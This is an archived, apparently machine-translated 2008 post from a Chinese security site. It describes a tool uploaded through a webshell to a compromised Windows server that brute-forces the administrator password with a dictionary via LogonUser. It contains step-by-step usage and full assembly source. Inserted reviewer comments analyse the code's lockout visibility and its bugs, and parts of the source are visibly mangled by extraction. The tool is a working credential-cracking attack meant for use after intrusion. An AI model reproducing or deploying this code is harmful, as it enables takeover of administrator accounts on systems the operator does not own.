Webshell under to crack computer administrator password-vulnerability warning-the black bar safety net

2008-10-26T00:00:00
ID MYHACK58:62200820812
Type myhack58
Reporter 佚名
Modified 2008-10-26T00:00:00

Description

Information source: Evil Octal Information Security Team (www.eviloctal.com)

This idea came from an earlier study of the runas command.

Method of use: 1, The your password dictionary was renamed into the psw. txt, upload to the target server is an executable, writable directory. It is assumed that this directory is: c:\windows\temp\ 2, The program upload to the c:\windows\temp\, and then run it. 3, and then is wait a few minutes(specific time to see your dictionary size. access to c:\windows\temp\under the result_. txt in the result, If it is empty it shows also not crack the finish, another time and then come back to see.

Features: No need to grab the hash, don't need administrator permissions, the ISUR_*the user will be able to use, slow this is also the characteristics of Oh in the test machine's performance is every seconds try 1 8 0 0 A A password so. Default crack the administrator user's password. To break Other, please self-modifying code.

result_.txt example:

The administrator's password is: tester
The program had tried 32653 times! :)
Use time:0 hour(s) 0 minute(s) 17.109 second(s),average speed: 1908 times/s.


The source code is as follows: AdminPassCrack.asm file

; Reviewer notes (documentation only; the code line below is unchanged):
; 32-bit MASM source (.386, flat model, stdcall) assembled with ml and linked
; as /subsystem:windows, i.e. a GUI-subsystem image with no console window.
; No MessageBox or console API is called anywhere in the listing; the only
; output channel is the result file named in the data segment below.
; _TotalTime.asm is pulled in textually via `include`, so the two listings
; on this page assemble as a single translation unit.
; DEBUG equ 0 is not referenced anywhere in the visible code.
; ; By taiwansee 2008.10.23 ; ; Use nmake or the following command to compile and link: ; ml /c /coff AdminPassCracker. asm ; Link /subsystem:windows AdminPassCracker. obj ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> .386 . model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include file definition ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows. inc include user32. inc includelib user32. lib include kernel32. inc includelib kernel32. lib include Advapi32. inc includelib Advapi32. lib include _TotalTime. asm ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Data segment ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> . const DEBUG equ 0

; Win32 LogonUser parameters: logon type 3 (NETWORK) with the default
; provider. Each LogonUser call below, successful or not, goes through the
; normal Windows authentication path, so every failed attempt is visible to
; logon-failure auditing (when auditing is enabled) and is counted by any
; account-lockout policy that applies to the target account.
LOGON32_LOGON_NETWORK equ 3 LOGON32_PROVIDER_DEFAULT equ 0

; Uninitialised globals: the module handle and the executable's own path.
; The entry code (start) truncates szFileName to the executable's directory
; and makes it the current directory, so the relative file names below are
; resolved next to wherever the binary was placed.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Data segment ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> align 4 . data? hModuleHandle DWORD ? szFileName BYTE MAX_PATH dup(?)

. data

; On-disk indicators of this tool: output file result_.txt and input
; dictionary psw.txt in the executable's directory. The target is the local
; machine ('.') and the 'administrator' account; both are fixed at assembly
; time.
szResultFile BYTE 'result_.txt',0 szPswDic BYTE 'psw.txt',0 szDomain BYTE '.', 0 szUserName BYTE 'administrator',0

; Success record written to result_.txt; %s receives the matching
; dictionary line, %d the attempt counter.
szResultFileFormat BYTE 'The administrator',27h,'s password is: %s',0dh,0ah BYTE 'The program had tried %d times! :)',0dh,0ah,0

; Fixed error / not-found strings, also written to result_.txt -- the
; binary has no other output channel.
szNoDicFileErr BYTE 'Sorry,dic file not exists.', 0 szCreateFileMappingErr BYTE 'CreateFileMapping Error!', 0 szMapViewOfFileErr BYTE 'MapViewOfFile Error!', 0 szNotFound BYTE 'Password not found! :(',0dh,0ah,0

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Code segment ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> > . code align 4

; _WinMain -- takes no parameters; called from start with the current
; directory already set to the executable's directory. Returns eax=1 after a
; result has been written, eax=0 on any error; the caller ignores the value.
; Stack locals: @szPswTmp and @szBuf are each MAX_PATH bytes.
_WinMain proc local @hPswDic:DWORD,\ @szPswTmp[MAX_PATH]:BYTE,\ @dwPswDicFileSize:DWORD,\ @hResultFile:DWORD,\ @dwWritten:DWORD,\ @hPswDicFileMap:DWORD,\ @hToken:DWORD,\ @dwTriedTimes:DWORD,\ @szBuf[MAX_PATH]:BYTE,\ @dwContentLength:DWORD,\ @lpPswDic:DWORD,\ @lpNext:DWORD,\ @lpStart:DWORD,\ @dwStart:DWORD

; Result file is opened with OPEN_ALWAYS (an existing file is reused, not
; truncated; writes start at offset 0). The dictionary is opened read-only
; and then memory-mapped. None of the handles obtained here (result file,
; dictionary, mapping, logon token) is closed anywhere in the listing -- the
; process relies on ExitProcess to reclaim them.
;Create file to record the results. invoke CreateFile,offset szResultFile,GENERIC_READ or GENERIC_WRITE,\ FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,\ FILE_ATTRIBUTE_NORMAL,NULL . if eax == INVALID_HANDLE_VALUE jmp _Error_Exit . endif mov @hResultFile,eax ;Open the Dictionary file. invoke CreateFile,offset szPswDic,GENERIC_READ,\ FILE_SHARE_READ,NULL,OPEN_EXISTING,\ FILE_ATTRIBUTE_NORMAL,NULL . if eax == INVALID_HANDLE_VALUE invoke WriteFile,@hResultFile,offset szNoDicFileErr,sizeof szNoDicFileErr,addr @dwWritten,NULL jmp _Error_Exit . endif mov @hPswDic,eax

; Map the whole dictionary read-only; @lpStart/@lpNext walk the view.
invoke GetFileSize,@hPswDic,NULL mov @dwPswDicFileSize,eax ;*CreateFileMapping* invoke CreateFileMapping,@hPswDic,NULL,PAGE_READONLY,0,0,NULL . if eax==NULL invoke WriteFile,@hResultFile,offset szCreateFileMappingErr,\ sizeof szCreateFileMappingErr,addr @dwWritten,NULL jmp _Error_Exit . endif mov @hPswDicFileMap,eax ;*MapViewOfFile* invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0 . if eax==NULL invoke WriteFile,@hResultFile,offset szMapViewOfFileErr,\ sizeof szMapViewOfFileErr,addr @dwWritten,NULL jmp _Error_Exit . endif mov @lpPswDic,eax mov @lpNext,eax mov @lpStart,eax

; Timing baseline (GetTickCount, milliseconds).
invoke GetTickCount ;calculated using the number of milliseconds,starting mov @dwStart,eax

; ecx = bytes of the mapped dictionary consumed so far; it is compared with
; the file size to detect the end of the dictionary. @dwTriedTimes counts
; failed attempts only (see the loop below).
xor ecx,ecx ;the statistics have been analyzed the number of characters xor eax,eax mov @dwTriedTimes,eax ;statistics the number of attempts

; Main loop: copy one dictionary line (up to 0dh) into @szPswTmp,
; NUL-terminate it (stosw), then hand it to LogonUser.
; Caveats visible in this code:
;  - the stosb copy has no check against the size of @szPswTmp, so a
;    dictionary line longer than MAX_PATH bytes overruns the stack buffer;
;  - line endings are assumed to be CRLF: the 0ah is skipped via esi+1 and
;    `add ecx,2` accounts for both bytes, so a LF-only file is never split
;    into separate lines;
;  - reaching the file size exactly treats the remainder as the final line;
;    overshooting it jumps to _NotFound.
. while TRUE cld mov esi,@lpStart lea edi,@szPswTmp @@: lodsb . if al!= 0dh stosb inc ecx . if ecx==@dwPswDicFileSize jmp @F . elseif ecx>@dwPswDicFileSize jmp _NotFound . endif jmp @B . endif @@: add ecx,2 xor eax,eax stosw ;with 0 at the end

lea eax,[esi+1] mov @lpNext,eax ;correction to the next password

; One authentication attempt per line. On failure ecx is restored, the
; cursor advances to the next line and @dwTriedTimes is incremented. On
; success the loop breaks without incrementing, so the reported count
; excludes the successful attempt; the token returned in @hToken is never
; used or closed.
push ecx ;save count value invoke LogonUser,offset szUserName,offset szDomain,addr @szPswTmp,\ LOGON32_LOGON_NETWORK,\ LOGON32_PROVIDER_DEFAULT,\ addr @hToken . if eax==NULL pop ecx ;restore the count value of the

push @lpNext pop @lpStart

inc @dwTriedTimes . continue . else pop ecx ;the stack balance . break . endif . endw

; Success path: elapsed milliseconds, then the result record.
invoke GetTickCount ;calculated using the number of milliseconds,the end of the sub eax,@dwStart mov @dwStart,eax

; wsprintf writes the format text plus the matching line into @szBuf, which
; is only MAX_PATH bytes; a dictionary line near MAX_PATH in length can
; overrun it.
invoke wsprintf,addr @szBuf,offset szResultFileFormat,addr @szPswTmp,@dwTriedTimes invoke lstrlen,addr @szBuf mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL

; Append the timing / rate line produced by _TotalTime (see _TotalTime.asm).
invoke _TotalTime,addr @szBuf,@dwStart,@dwTriedTimes,NULL invoke lstrlen,addr @szBuf mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL

; Return 1 (result written).
xor eax,eax inc eax ret

; Dictionary exhausted: write the not-found notice plus timing, using
; @szPswTmp as scratch for the _TotalTime output before concatenating.
_NotFound: invoke GetTickCount ;calculated using the number of milliseconds,starting sub eax,@dwStart mov @dwStart,eax

invoke lstrcpy,addr @szBuf,offset szNotFound invoke _TotalTime,addr @szPswTmp,@dwStart,@dwTriedTimes,NULL invoke lstrcat,addr @szBuf,addr @szPswTmp

invoke lstrlen,addr @szBuf mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL

; _Error_Exit returns 0 (falls through from _NotFound as well).
; start: fetches the module path, scans backwards (std / lodsb) for the last
; backslash, writes a NUL just after it (esi points one byte before the
; backslash after lodsb with DF set, hence [esi+2]) and makes that directory
; current, so psw.txt / result_.txt are resolved next to the executable. The
; backward scan has no lower bound and relies on GetModuleFileName returning
; a path that contains a backslash. cld is restored before the next API
; call. ExitProcess(NULL) ignores _WinMain's return value.
; (The trailing "_TotalTime. asm file" on this line is the heading of the
; second listing on the page, not code.)
_Error_Exit: xor eax,eax ret _WinMain endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> start: invoke GetModuleHandle,NULL mov hModuleHandle,eax invoke GetModuleFileName,hModuleHandle,offset szFileName,sizeof szFileName invoke lstrlen,offset szFileName cld mov esi,offset szFileName add esi,eax std @@: lodsb cmp al,5ch jne @B mov byte ptr [esi+2],0 cld invoke SetCurrentDirectory,offset szFileName call _WinMain invoke ExitProcess,NULL ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> end start _TotalTime. asm file

; Timing / rate format used by _TotalTime: hours, minutes, seconds,
; milliseconds and an integer average speed. The "% 03d" visible here looks
; like an extraction artefact of "%03d" (zero-padded milliseconds) --
; confirm against the original file before assembling.
szResultFormat BYTE 'Use time:%d hour(s) %d minute(s) %d.% 03d second(s),average speed: %d times/s.', 0dh,0ah,0

; _TotalTime(_lpBuf, _dwTotalTime, _dwThingsHappend, _FutrueExtention)
; Formats an elapsed time in milliseconds and an events-per-second rate into
; _lpBuf via wsprintf / szResultFormat. Always returns eax=1.
; _FutrueExtention is never read; locals @dwStart and @dwSus are unused.
; ABI note: ebx is used as the divisor register throughout but is never
; saved or restored (no `uses ebx`, no push/pop). ebx is callee-saved under
; the Win32 stdcall convention, so a caller that keeps a live value in ebx
; across this call would see it clobbered. _WinMain on this page does not
; use ebx, so the defect is latent here.
. code ;******** ; _TotalTime ;_lpBuf for the caller to provide the received result buffer ;_dwTotalTime for the total time, in General, the front has ;invoke GetTickCount ;sub eax,@dwStart ;These two instructions ;_dwThingsHappend for the timing period, the event of interest occurs to the number of ;_FutrueExtention for future development with ;******** _TotalTime proc _lpBuf,_dwTotalTime,_dwThingsHappend,_FutrueExtention

local @dwStart:DWORD,\ @dwMilliseconds:DWORD,\ @dwSecond:DWORD,\ @dwMinute:DWORD,\ @dwHour:DWORD,\ @dwSus:DWORD,\ @AVGSpeed:DWORD

; Successive unsigned divisions, each with edx cleared first:
; ms = t mod 1000, then seconds mod 60, minutes mod 60, hours mod 24.
; Whole days are discarded from the output.
mov eax,_dwTotalTime ;In terms of time xor edx,edx mov ebx,1 0 0 0 div ebx mov @dwMilliseconds,edx ;MS

xor edx,edx mov ebx,6 0 div ebx mov @dwSecond,edx

xor edx,edx mov ebx,6 0 div ebx mov @dwMinute,edx

xor edx,edx mov ebx,2 4 div ebx mov @dwHour,edx

; Average speed = (events * 1000) / ms. The xor edx,edx here is redundant:
; mul writes the high dword of the product into edx, and the div below then
; consumes the full 64-bit edx:eax product. The quotient must fit in 32
; bits or div raises a divide error; with realistic counts and times it does.
;Calculate the average speed:_dwThingsHappend÷_dwTotalTime xor edx,edx

mov eax,_dwThingsHappend ;_dwThingsHappend also expanded 1 0 0 0 times(because _dwTotalTime time is number of milliseconds) mov ebx,1 0 0 0 mul ebx

; Division-by-zero guard: when the elapsed time is 0 ms the raw event count
; is reported as the speed instead.
mov ebx,_dwTotalTime ;the _dwTotalTime the values are restored to ebx . if ebx!= 0 div ebx mov @AVGSpeed,eax . else ;if _dwTotalTime is 0,indicating that run time is too small,can not count,here with _dwThingsHappend as@AVGSpeed. push _dwThingsHappend pop @AVGSpeed . endif

; Render into the caller's buffer; no length limit is passed (wsprintf).
invoke wsprintf,_lpBuf,\ offset szResultFormat,\ @dwHour,\ @dwMinute,\ @dwSecond,\ @dwMilliseconds,\ @AVGSpeed

; Return 1.
xor eax,eax inc eax ret _TotalTime endp